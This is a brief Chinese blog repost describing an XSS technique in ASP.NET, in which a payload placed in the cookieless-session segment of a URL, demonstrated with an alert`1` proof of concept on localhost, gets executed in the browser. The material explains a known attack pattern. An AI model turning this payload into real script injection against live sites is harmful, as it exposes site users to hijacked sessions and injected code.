首页 > Web开发 > 详细

XSS实例 All is XSS that comes to the .NET

时间:2020-04-21 19:32:20      阅读:71      评论:0      收藏:0      [点我收藏+]

All is XSS that comes to the .NET

通杀.NET的XSS!

https://localhost:44345/(A(%22onerror=%22alert%601%60%22))/xss.aspx

(A("onerror="alert`1`"))

在asp.net的url中嵌入一段,然后这段js会被执行。

最坏的情况,可以直接注入一段js到客户端

 

XSS实例 All is XSS that comes to the .NET

原文:https://www.cnblogs.com/chucklu/p/12747075.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!